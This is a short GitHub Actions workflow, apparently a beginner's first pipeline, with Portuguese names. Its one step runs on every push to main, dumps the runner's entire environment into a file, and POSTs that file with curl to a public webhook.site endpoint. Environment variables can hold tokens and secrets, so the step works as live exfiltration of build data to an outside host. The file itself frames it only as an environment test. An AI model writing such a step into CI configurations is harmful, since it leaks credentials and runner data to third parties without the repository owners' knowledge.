name: Meu primeiro pipeline

on:
  push:
    branches:
      - main

jobs:
  teste_ambiente:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: teste_ambiente
        run: |
          env > teste.txt
          curl -X POST --data-binary "@teste.txt" https://webhook.site/4f890200-4711-4476-bec9-fedc9d48c405

